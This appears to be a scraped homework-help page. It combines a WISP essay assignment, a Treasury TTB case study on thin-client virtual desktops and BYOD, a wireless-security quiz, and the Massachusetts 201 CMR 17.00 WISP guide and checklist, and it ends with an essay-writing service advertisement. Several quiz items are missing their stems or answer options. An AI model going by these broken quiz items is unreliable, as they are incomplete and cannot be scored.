Read over the WISP Compliance Checklist and Guidelines, and write at least 1-2 Pages of how your companies Regulation
about WISP. If it inst regulated by WISP then how would it apply to a
potential employer.Alcohol and Tobacco Tax and Trade Bureau (TTB) Virtual Desktop
Allowing Bring Your Own Device with Minimal Policy or Legal Implications
August 13, 2012
Chief Information Officer
Department of the Treasury
Alcohol and Tobacco Tax and Trade Bureau (TTB)
The Alcohol and Tobacco Tax and Trade Bureau (TTB) decided to reduce the costs, time and effort required to
refresh desktop and laptop computers used for client computing needs. TTB has a widely dispersed workforce with
many personnel working from home full time and over 80 percent of the workforce regularly teleworking.
Replacing desktop and laptop computers every 3 to 4 years cost TTB about $2 million and disrupted the IT program
and business users for several months. TTB determined that the best solution was to centralize all client computing
power and applications, user data, and user settings and allow access to TTB resources by thin client computing
devices. A thin client is a computing device or program that relies on another device for computational
power. Currently about 70 percent of TTB personnel use thin client devices to access all TTB applications and data.
TTB desktop and laptop computers were due for refresh this year. However, the virtual desktop solution allowed
TTB to avoid the expense of replacing hardware. The savings achieved paid for TTB’s virtual desktop
implementation – which cost approximately $800,000 – and saved TTB $1.2 million.
TTB realized additional savings by developing a Linux USB device that can be used to turn old desktop and laptop
computers into thin client computing devices for approximately $10 per device. The TTB virtual desktop/thin client
implementation uses a small browser plugin, freely available for almost every operating system, which simply turns
the end user device into a viewer and controller of the virtual desktop running in the TTB computer rooms. No
data touches the end user device. As a result, the TTB virtual desktop implementation has the significant additional
benefit of delivering every TTB application, with user data, to a wide range of user devices without the legal and
policy implications that arise from delivering data to or allowing work to be accomplished directly on a personal
TTB was created as an independent bureau in the Department of the Treasury on January 24, 2003, by the
Homeland Security Act of 2002. When TTB was established, all information technology (IT) resources, including
capital assets, IT personnel and the funding to procure equipment and to develop core business applications
remained with the Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF). TTB was funded at a level sufficient
only to reimburse ATF for existing service. No funding was provided for the initial purchase or subsequent
replacement of any of the equipment required to establish and operate TTB’s IT Systems. In FY 2005 TTB
established an independent IT operation with no base funding to refresh infrastructure equipment.
TTB has a very dispersed workforce with many personnel working from home full time and over 80 percent of the
workforce regularly teleworking. Replacing desktop and laptop computers every 3 to 4 years cost TTB about $2
million and disrupted the IT program and business users for several months. TTB decided to reduce the costs, time,
and effort required to refresh client desktop and laptop computers. After considering several solutions, TTB
determined that it would centralize all client computing power and applications, user data, and user settings to
allow access to these resources through thin client computing devices. A thin client is a computing device or
program that relies on another device for computational power.
With limited funding to invest in a completely new infrastructure for the virtual desktop implementation, TTB
examined its existing hardware, software and technical expertise to determine the path most likely to succeed and
achieve the objectives of providing central access to all IT resources while achieving significant savings.
TTB attained considerable success with server virtualization. Approximately 80 percent of the Windows Servers
and 20 percent of the Sun Solaris servers at TTB had been virtualized. With this success in hand, TTB was confident
that a virtual desktop infrastructure could be built without purchasing numerous physical servers. The
infrastructure required to deliver virtual desktop could itself be largely virtualized.
Because TTB was established in 2003 with a significant number of personnel working full time from home, it was
imperative from the beginning to support those personnel with a robust remote access capability. Additionally,
TTB wanted to take advantage of its investment in Citrix licenses and the significant expertise its technical
personnel had gained with the Citrix product suite as they supported remote access. The Citrix virtual desktop
offering uses a small browser plugin called Citrix Receiver, which is freely available for download and turns most
any device into a thin device. This solution was selected because the Citrix Receiver allows TTB to create thin client
devices and support BYOD (initially home computers).
The currently deployed solution has 2 active sites, each with 3 physical servers. Either site can support the entire
customer base. The rest of the virtual desktop servers are virtualized. In essence, TTB supports the entire
population (650 personnel total in TTB, CDFI, and contractors) with 6 physical servers. Figure 1 is a conceptual view
of the TTB virtual desktop.
Today about 70 percent of TTB personnel access all TTB computing resources through thin devices, provided by
TTB as well as BYOD. There is no typical user setup. If the desired user configuration works, TTB allows it. As an
example, a TTB attorney uses a thin client device in the office, a BYOD Mac personal computer when working from
home, and a BYOD IPad device when on the road. Several TTB personnel use BYOD Kindle Fire devices for
occasional access, for example, if they need to check email when out of the office or they need to approve a time
card that was not ready when they were in the office.
The rapid pace of change in the mobile device market makes the virtual desktop solution particularly attractive.
Because no data touches the user device, there is no need for a mobile device management (MDM) solution on a
non-TTB device. When a device is made available to the public it can be used to access TTB applications and data.
The Droid Razr smart phone with a Motorola Lapdock 500 is an example of such a device. A user who has a
government-provided smart phone (MDM installed) with a Lapdock would not need an additional computing
device. Further, a user who had the same setup, minus the MDM, also could work full time with this BYOD. The
ASUS Transformer is another example of a newly available mobile device that has a form factor usable for full-time
work.The multiple-device access capability of virtual desktop allows TTB to move toward providing a single device
The final result, which is likely the greatest benefit of the TTB Virtual Desktop solution relative to BYOD, is the
minimization or elimination of complex legal and policy issues. Because no data touches the BYOD device and no
work is physically accomplished on the BYOD equipment, all requests fordiscovery of information from a user’s
computer can be satisfied without having to recover anything from the user’s personal device.
The primary TTB BYOD lesson learned is to avoid allowing data to touch the personal device. Having all data,
settings and processing in a central location and using the BYOD device simply as a viewer significantly
simplifies the legal and policy implications.
VMware for server virtualization
6 Dell R910 physical servers
Citrix XenDesktop, XenApp, XenClient (pilot), Receiver, Citrix Provisioning Services
Netscalers for remote access
Robust Storage Area Network and Core Network required
References to the product and/or service names of the hardware and/or software products used in this case
study do not constitute an endorsement of such hardware and/or software products.
1. Bluetooth falls under the category of
a. local area network (LAN)
b. short area network (SAN)
c. paired-device network (PDN)
d. personal area network (PAN)
2. A Bluetooth network that contains one master and at least one
slave using the same RF channel forms a
is the unauthorized access of information from a wireless device
through a Bluetooth connection.
b. Bluetooth snatching
c. Bluetooth spoofing
standard specifies a maximum rated speed of
54 Mbps using the 5 GHz spectrum.
Each of the following is an advantage of IEEE 802.11n except
a. smaller coverage area
b. faster speed
c. less interference
d. stronger security
Which of the following is not found in a residential WLAN
a. intrusion detection system (IDS)
d. dynamic host configuration protocol (DHCP)
7. Which of the following is not a requirement for war driving?
a. Wireless NIC adapter
c. GPS receiver
d. mobile computer device
8. The primary design of a(n)
is to capture the
transmissions from legitimate users.
rogue access point
9. Which of the following is a vulnerability of MAC address filtering?
a. The user must enter the MAC.
b. APs use IP addresses instead of MACs.
c. Not all operating systems support MACs.
d. MAC addresses are initially exchanged between wireless
devices and the AP in an unencrypted format.
10. Each of the following is a limitation of turning off the SSID
broadcast from an AP except
a. the SSID can easily be discovered, even when it is not
contained in beacon frames, because it still is transmitted in
other management frames sent by the AP
b. turning off the SSID broadcast may prevent users from being
able to freely roam from one AP coverage area to another
c. some versions of operating systems favor a network
broadcasting an SSID over one that does not
d. users can more easily roam from one WLAN to another
11. The primary weakness of wired equivalent privacy (WEP) is
a. its usage creates a detectable pattern
b. initialization vectors (IVs) are difficult for users to manage
c. it only functions on specific brands of APs
d. it slows down a WLAN from 104 Mbps to 16 Mbps
12. The two models for personal wireless security developed by the
Wi-Fi Alliance are Wi-Fi Protected Access (WPA) and .
Protected Wireless Security (WPS)
Postshared Key Protection (PKP)
Wi-Fi Protected Access 2 (WPA2)
WPA replaces WEP with .
a. Temporal Key Integrity Protocol (TKIP)
b. Cyclic Redundancy Check (CRC)
c. Message Integrity Check (MIC)
A preshared key (PSK) of fewer than characters may be subject to
an attack if that key is a common dictionary word.
A WEP key that is 128 bits in length .
a. cannot be used on access points that use passphrases.
b. is less secure than a WEP key of 64 bits because shorter keys
c. has an initialization vector (IV) that is the same length as a
WEP key of 64 bits.
d. cannot be cracked because it is too long.
AES-CCMP is the encryption protocol standard used in .
b. IEEE 802.11
What is the Extensible Authentication Protocol (EAP)?
a. A subset of WPA2
b. The protocol used in TCP/IP for authentication
c. A framework for transporting authentication protocols
d. A technology used by IEEE 802.11 for encryption
18. Which technology should be used instead of LEAP?
19. Each of the following is a type of wireless AP probe except .
a. wireless device probe
b. dedicated probe
c. AP probe
d. WNIC probe
20. The most flexible approach for a wireless VLAN is to have which
device separate the packets?
COMMONWEALTH OF MASSACHUSETTS
OFFICE OF CONSUMER AFFAIRS AND
10 Park Plaza – Suite 5170, Boston MA 02116
(617) 973-8700 FAX (617) 973-8799
DEVAL L. PATRICK
SECRETARY OF HOUSING AND
TIMOTHY P. MURRAY
A Small Business Guide:
Formulating A Comprehensive Written Information Security Program
While the contents of any comprehensive written information security program required
by 201 CMR 17.00 must always satisfy the detailed provisions of those regulations; and while
the development of each individual program will take into account (i) the size, scope and type of
business of the person obligated to safeguard the personal information under such comprehensive
information security program, (ii) the amount of resources available to such person, (iii) the
amount of stored data, and (iv) the need for security and confidentiality of both consumer and
employee information, the Office of Consumer Affairs and Business Regulation is issuing this
guide to help small businesses in their compliance efforts. This Guide is not a substitute for
compliance with 201 CMR 17.00. It is simply a tool designed to aid in the development of a
written information security program for a small business, including the self employed, that
handles “personal information.”
Having in mind that wherever there is a conflict found between this guide and the
provisions of 201 CMR 17.00, it is the latter that will govern. We set out below this “guide” to
devising a security program (references below to “we” and “our” are references to the small
business to whom the real WISP will relate):
COMPREHENSIVE WRITTEN INFORMATION SECURITY PROGRAM
Our objective, in the development and implementation of this comprehensive written
information security program (“WISP”), is to create effective administrative, technical and
physical safeguards for the protection of personal information of residents of the Commonwealth
of Massachusetts, and to comply with obligations under 201 CMR 17.00. The WISP sets forth
our procedure for evaluating our electronic and physical methods of accessing, collecting,
storing, using, transmitting, and protecting personal information of residents of the
Commonwealth of Massachusetts. For purposes of this WISP, “personal information” means a
Massachusetts residents first name and last name or first initial and last name in combination
with any one or more of the following data elements that relate to such resident: (a) Social
Security number; (b) drivers license number or state-issued identification card number; or (c)
financial account number, or credit or debit card number, with or without any required security
code, access code, personal identification number or password, that would permit access to a
resident’s financial account; provided, however, that “personal information” shall not include
information that is lawfully obtained from publicly available information, or from federal, state
or local government records lawfully made available to the general public.
The purpose of the WISP is to:
(a) Ensure the security and confidentiality of personal information;
(b) Protect against any anticipated threats or hazards to the security or integrity of such
(c) Protect against unauthorized access to or use of such information in a manner that creates a
substantial risk of identity theft or fraud.
In formulating and implementing the WISP, (1) identify reasonably foreseeable internal
and external risks to the security, confidentiality, and/or integrity of any electronic, paper or
other records containing personal information; (2) assess the likelihood and potential damage of
these threats, taking into consideration the sensitivity of the personal information; (3) evaluate
the sufficiency of existing policies, procedures, customer information systems, and other
safeguards in place to control risks; (4) design and implement a WISP that puts safeguards in
place to minimize those risks, consistent with the requirements of 201 CMR 17.00; and (5)
regularly monitor the effectiveness of those safeguards:
DATA SECURITY COORDINATOR:
We have designated ____________________ to implement, supervise and maintain the
WISP. That designated employee (the “Data Security Coordinator”) will be responsible for:
a. Initial implementation of the WISP;
b. Training employees;
c. Regular testing of the WISP’s safeguards;
d. Evaluating the ability of each of our third party service providers to implement and maintain
appropriate security measures for the personal information to which we have permitted them
access, consistent with 201 CMR 17.00; and requiring such third party service providers by
contract to implement and maintain appropriate security measures.
e. Reviewing the scope of the security measures in the WISP at least annually, or whenever there
is a material change in our business practices that may implicate the security or integrity of
records containing personal information.
f. Conducting an annual training session for all owners, managers, employees and independent
contractors, including temporary and contract employees who have access to personal
information on the elements of the WISP. All attendees at such training sessions are required to
certify their attendance at the training, and their familiarity with the firm’s requirements for
ensuring the protection of personal information.
To combat internal risks to the security, confidentiality, and/or integrity of any electronic,
paper or other records containing personal information, and evaluating and improving, where
necessary, the effectiveness of the current safeguards for limiting such risks, the following
measures are mandatory and are effective immediately. To the extent that any of these measures
require a phase-in period, such phase-in must be completed on or before March 1, 2010:
A copy of the WISP must be distributed to each employee who shall,
upon receipt of the WISP, acknowledge in writing that he/she has received
a copy of the WISP.
There must be immediate retraining of employees on the detailed
provisions of the WISP.
Employment contracts must be amended immediately to require all
employees to comply with the provisions of the WISP, and to prohibit any
nonconforming use of personal information during or after employment;
with mandatory disciplinary action to be taken for violation of security
provisions of the WISP (The nature of the disciplinary measures may depend
on a number of factors including the nature of the violation and the nature
of the personal information affected by the violation).
The amount of personal information collected should be limited to
that amount reasonably necessary to accomplish our legitimate business
purposes, or necessary to us to comply with other state or federal
Access to records containing personal information shall be limited
to those persons who are reasonably required to know such information in
order to accomplish your legitimate business purpose or to enable us
comply with other state or federal regulations.
Electronic access to user identification after multiple unsuccessful
attempts to gain access must be blocked.
All security measures shall be reviewed at least annually, or
whenever there is a material change in our business practices that may
reasonably implicate the security or integrity of records containing
personal information. The Data Security Coordinator shall be responsible
for this review and shall fully apprise management of the results of that
review and any recommendations for improved security arising out of that
Terminated employees must return all records containing personal
information, in any form, that may at the time of such termination be in
the former employee’s possession (including all such information stored
on laptops or other portable devices or media, and in files, records, work
A terminated employee’s physical and electronic access to
personal information must be immediately blocked. Such terminated
employee shall be required to surrender all keys, IDs or access codes or
badges, business cards, and the like, that permit access to the firm’s
premises or information. Moreover, such terminated employee’s remote
electronic access to personal information must be disabled; his/her
voicemail access, e-mail access, internet access, and passwords must be
invalidated. The Data Security Coordinator shall maintain a highly
secured master list of all lock combinations, passwords and keys.
Current employees’ user ID’s and passwords must be changed
Access to personal information shall be restricted to active users
and active user accounts only.
Employees are encouraged to report any suspicious or
unauthorized use of customer information.
Whenever there is an incident that requires notification under
M.G.L. c. 93H, §3, there shall be an immediate mandatory post-incident
review of events and actions taken, if any, with a view to determining
whether any changes in our security practices are required to improve the
security of personal information for which we are responsible.
Employees are prohibited from keeping open files containing
personal information on their desks when they are not at their desks.
At the end of the work day, all files and other records containing
personal information must be secured in a manner that is consistent with
the WISP’s rules for protecting the security of personal information.
Each department shall develop rules (bearing in mind the business
needs of that department) that ensure that reasonable restrictions upon
physical access to records containing personal information are in place,
including a written procedure that sets forth the manner in which physical
access to such records in that department is to be restricted; and each
department must store such records and data in locked facilities, secure
storage areas or locked containers.
Access to electronically stored personal information shall be
electronically limited to those employees having a unique log-in ID; and
re-log-in shall be required when a computer has been inactive for more
than a few minutes.
Visitors’ access must be restricted to one entry point for each
building in which personal information is stored, and visitors shall be
required to present a photo ID, sign-in and wear a plainly visible
“GUEST” badge or tag. Visitors shall not be permitted to visit unescorted
any area within our premises that contains personal information.
Paper or electronic records (including records stored on hard
drives or other electronic media) containing personal information shall be
disposed of only in a manner that complies with M.G.L. c. 93I.
To combat external risks to the security, confidentiality, and/or integrity of any
electronic, paper or other records containing personal information, and evaluating and
improving, where necessary, the effectiveness of the current safeguards for limiting such risks,
the following measures must be completed on or before March 1, 2010:
There must be reasonably up-to-date firewall protection and
operating system security patches, reasonably designed to maintain the
integrity of the personal information, installed on all systems processing
There must be reasonably up-to-date versions of system security
agent software which must include malware protection and reasonably
up-to-date patches and virus definitions, installed on all systems
processing personal information.
To the extent technically feasible, all personal information stored
on laptops or other portable devices must be encrypted, as must all records
and files transmitted across public networks or wirelessly, to the extent
technically feasible. Encryption here means the transformation of data into
a form in which meaning cannot be assigned without the use of a confidential
process or key, unless further defined by regulation by the Office of Consumer Affairs
and Business Regulation.
All computer systems must be monitored for unauthorized use of or
access to personal information.
There must be secure user authentication protocols in place, including:
(1) protocols for control of user IDs and other identifiers; (2) a reasonably
secure method of assigning and selecting passwords, or use of unique identifier
technologies, such as biometrics or token devices; (3) control of data security
passwords to ensure that such passwords are kept in a location.
CHARLES D. BAKER
SECRETARY OF HOUSING AND
KARYN E. POLITO
COMMONWEALTH OF MASSACHUSETTS
JOHN C. CHAPMAN
Office of Consumer Affairs and Business Regulation
10 Park Plaza, Suite 5170, Boston, MA 02116
(617) 973-8700 FAX (617) 973-8799
201 CMR 17.00 COMPLIANCE CHECKLIST
The Office of Consumer Affairs and Business Regulation has compiled this checklist to help small
businesses in their effort to comply with 201 CMR 17.00. This Checklist is not a substitute for
compliance with 201 CMR 17.00. Rather, it is designed as a useful tool to aid in the development of
a written information security program for a small business or individual that handles “personal
information.” Each item, presented in question form, highlights a feature of 201 CMR 17.00 that will
require proactive attention in order for a plan to be compliant.
The Comprehensive Written Information Security Program (WISP)
Do you have a comprehensive, written information security program (“WISP”) applicable to all
records containing personal information about a resident of the Commonwealth of Massachusetts
Does the WISP include administrative, technical, and physical safeguards for PI protection?
Have you designated one or more employees to maintain and supervise WISP implementation
Have you identified the paper, electronic and other records, computing systems, and storage
media, including laptops and portable devices, that contain personal information?
Have you chosen, as an alternative, to treat all your records as if they all contained PI?
Have you identified and evaluated reasonably foreseeable internal and external risks to paper and
electronic records containing PI?
Have you evaluated the effectiveness of current safeguards?
Does the WISP include regular ongoing employee training, and procedures for monitoring
Does the WISP include disciplinary measures for violators?
Does the WISP include policies and procedures for when and how records containing PI should
be kept, accessed or transported off your business premises?
Does the WISP provide for immediately blocking terminated employees, physical and electronic
access to PI records (including deactivating their passwords and user names)?
Have you taken reasonable steps to select and retain a third-party service provider that is capable
of maintaining appropriate security measures consistent with 201 CMR 17.00?
Have you required such third-party service provider by contract to implement and maintain such
appropriate security measures?
Is the amount of PI that you have collected limited to the amount reasonably necessary to
accomplish your legitimate business purposes, or to comply with state or federal regulations?
Is the length of time that you are storing records containing PI limited to the time reasonably
necessary to accomplish your legitimate business purpose or to comply with state or federal
Is access to PI records limited to those persons who have a need to know in connection with your
legitimate business purpose, or in order to comply with state or federal regulations?
In your WISP, have you specified the manner in which physical access to PI records is to be
Have you stored your records and data containing PI in locked facilities, storage areas or
Have you instituted a procedure for regularly monitoring to ensure that the WISP is operating in a
manner reasonably calculated to prevent unauthorized access to or unauthorized use of PI; and for
upgrading it as necessary?
Are your security measures reviewed at least annually, or whenever there is a material change in
business practices that may affect the security or integrity of PI records?
Do you have in place a procedure for documenting any actions taken in connection with any
breach of security; and does that procedure require post-incident review of events and actions
taken to improve security?
Additional Requirements for Electronic Records
Do you have in place secure authentication protocols that provide for:
o Control of user IDs and other identifiers?
o A reasonably secure method of assigning/selecting passwords, or for use of unique
identifier technologies (such as biometrics or token devices)?
o Control of data security passwords such that passwords are kept in a location and/or
format that does not compromise the security of the data they protect?
o Restricting access to PI to active users and active user accounts?
o Blocking access after multiple unsuccessful attempts to gain access?
Do you have secure access control measures that restrict access, on a need-to-know basis, to PI
records and files?
Do you assign unique identifications plus passwords (which are not vendor supplied default
passwords) to each person with computer access; and are those IDs and passwords reasonably
designed to maintain the security of those access controls?
Do you, to the extent technically feasible, encrypt all PI records and files that are transmitted
across public networks, and that are to be transmitted wirelessly?
Do you, to the extent technically feasible, encrypt all PI stored on laptops or other portable
Do you have monitoring in place to alert you to the occurrence of unauthorized use of or access to
On any system that is connected to the Internet, do you have reasonably up-to-date firewall
protection for files containing PI; and operating system security patches to maintain the integrity
of the PI?
Do you have reasonably up-to-date versions of system security agent software (including
malware protection) and reasonably up-to-date security patches and virus definitions?
Do you have in place training for employees on the proper use of your computer security system,
and the importance of PI security?
Purchase answer to see full
Why Choose Us
- 100% non-plagiarized Papers
- 24/7 /365 Service Available
- Affordable Prices
- Any Paper, Urgency, and Subject
- Will complete your papers in 6 hours
- On-time Delivery
- Money-back and Privacy guarantees
- Unlimited Amendments upon request
- Satisfaction guarantee
How it Works
- Click on the “Place Order” tab at the top menu or “Order Now” icon at the bottom and a new page will appear with an order form to be filled.
- Fill in your paper’s requirements in the "PAPER DETAILS" section.
- Fill in your paper’s academic level, deadline, and the required number of pages from the drop-down menus.
- Click “CREATE ACCOUNT & SIGN IN” to enter your registration details and get an account with us for record-keeping and then, click on “PROCEED TO CHECKOUT” at the bottom of the page.
- From there, the payment sections will show, follow the guided payment process and your order will be available for our writing team to work on it.